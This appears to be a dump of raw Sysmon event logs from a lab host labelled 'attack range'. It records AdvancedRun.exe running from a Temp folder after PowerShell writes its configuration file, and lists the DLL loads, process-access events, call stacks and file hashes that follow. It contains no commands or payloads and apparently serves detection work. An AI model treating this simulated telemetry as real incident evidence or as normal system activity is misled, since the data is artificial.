C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003988661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:42.786{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003988642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:39.707{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:39.707{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:39.707{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4283132C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.099{834264DD-DB11-61EA-9500-000000002702}4281808C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003988605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:32.068{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003988604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.911{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.911{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.818{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.818{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.802{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.787{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003988598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.771{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003988597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.771{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003988596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.771{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003988595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003988594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.755{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 